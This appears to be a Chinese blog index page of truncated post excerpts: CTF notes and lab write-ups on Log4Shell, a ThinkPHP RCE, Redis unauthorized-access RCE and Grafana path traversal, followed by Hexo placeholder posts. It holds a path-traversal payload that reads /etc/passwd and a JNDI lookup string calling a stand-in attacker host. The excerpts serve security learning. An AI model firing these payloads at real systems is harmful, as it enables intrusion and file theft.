BUUCTF-Web 综合练习笔记
前言:本文用于记录在 BUUCTF 平台 Web 赛道的练习过程。按照“每日一题”或“每周一记”的频率持续更新,重点记录解题思路、核心 Payload 及知识盲区。 🚩 题目快捷索引 (Jump To) 1. [HCTF 2018]WarmUp —— PHP 代码审计 2. [强网杯 2019]随便注 —— 堆叠注入/Handler 3. [SUCTF 2019]EasySQL —— 数字型注入/管道符 📝 解题历程1. [HCTF 2018]WarmUp 涉及知识点:include 包含漏洞、PHP 弱类型、目录穿越 难度评分:⭐ 解题过程: 查看源码发现 source.php。 代码审计:分析三个 if 过滤逻辑。 构造 Payload:利用 ?file=source.php?../../../../etc/passwd 绕过。 关键 Payload:?file=source.php?../../../../ffffllllaaaagggg
Log4j2 远程代码执行
漏洞基本信息 项目 内容 漏洞名称 Apache Log4j2 远程代码执行 (Log4Shell) CVE 编号 CVE-2021-44228 危险等级 Critical (10.0) 测试环境 Kali Linux (Vulhub / Apache Solr 8.11.0) 攻击机 IP 192.168.89.130 (以实际为准) 漏洞深度原理Log4j2 的 Lookup 功能允许在日志中解析变量。当攻击者传入 ${jndi:ldap://attacker.com/Exploit} 时: Log4j2 解析 JNDI 协议,触发对远程 LDAP 服务器的请求。 LDAP 服务 返回一个 Java 引用对象,指向攻击者托管的 .class 文件。 目标服务器 下载并实例化该恶意类,触发其中的 static 代码块,从而执行任意命令(如反弹 Shell)。 渗透测试过程 (Exploit)技术亮点:本次实验摒弃了“一键利用工具”,完全采用手动编译和底层转发工具实现。 1. 编写恶意 Java 载荷 (Ex...
ThinkPHP
漏洞基本信息 项目 内容 漏洞名称 ThinkPHP 5.0.23 远程代码执行 (RCE) 漏洞原理 构造函数覆盖(Variable Coverage)导致过滤失效 危险等级 Critical 测试环境 Kali Linux (Vulhub / Docker) 靶场目录 ~/Desktop/vulhub/thinkphp/5.0.23-rce 漏洞成因分析ThinkPHP 5.x 版本在处理核心请求类时,由于对 _method 参数缺乏严格过滤,导致攻击者可以触发 Request 类的构造函数 __construct 进行变量覆盖。 核心逻辑:通过 _method=__construct 覆盖类属性 filter。 函数调用:将 filter[] 设置为 system 等敏感函数。 绕过限制:利用 s=captcha 等合法路由诱导框架进入错误的解析逻辑,最终执行攻击者传入的恶意指令。 渗透测试过程 (Exploit)免责声明: 本实验仅用于安全教学与授权渗透测试,严禁用于任何非法用途。 1. 环境启动与初始化进入靶场目录,执...
Redis 未授权访问致 RCE 实战
漏洞基本信息 项目 内容 漏洞名称 Redis 未授权访问致远程代码执行 (RCE) 漏洞原理 主从复制 (Master-Slave Replication) & 模块加载 危险等级 Critical 受影响版本 Redis 4.x / 5.x 部分版本 测试环境 Kali Linux (Vulhub / Docker) 靶场目录 ~/Desktop/vulhub/redis/4-unacc 漏洞成因分析Redis 默认配置下如果未开启 requirepass(认证密码)并绑定在 0.0.0.0,攻击者可直接远程连入数据库。 未授权进入:攻击者利用 6379 端口的未授权访问特性直接操控数据库。 主从同步利用:这是 RCE 的关键。攻击者通过伪造一个恶意的 Master 节点,利用 Redis 的 SLAVEOF 指令诱导受害节点进行全量同步。 恶意模块传输:在同步过程中,攻击者会将一个编译好的恶意动态链接库(.so 文件)作为“同步数据”发送给受害节点。 指令触发:受害节点接收到该文件并保存后,攻击者通过 MOD...
Grafana 目录穿越漏洞实战
漏洞基本信息 项目 内容 漏洞名称 Grafana 路径规范化缺陷 (目录穿越/任意文件读取) CVE 编号 CVE-2021-43798 危险等级 Critical 受影响版本 v8.0.0-beta1 至 v8.3.0 测试环境 Kali Linux (Vulhub / Docker) 靶场目录 ~/Desktop/vulhub/grafana/CVE-2021-43798 漏洞成因分析Grafana 在处理插件(Plugins)静态资源请求的 URL 时,由于对文件路径的限制不严格,导致了该漏洞的产生。 逻辑缺陷:程序未能正确过滤或规范化路径中的 ../ 字符。 未授权访问:由于 /public/plugins/ 接口用于加载插件静态资源,默认无需登录即可访问,这使得攻击者可以在未授权的情况下实施攻击。 常见影响:访问到本不该被读取的服务器本地文件,如 /etc/passwd、配置文件、密钥等。 渗透测试过程 (PoC)免责声明: 本实验仅用于安全教学与授权渗透测试,严禁用于任何非法用途。 1. 漏洞验证 (...
无标题
1234title:第一篇文章data:updated: ##这是我的第一篇文章
test
#这是一个标题 1123456789
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment







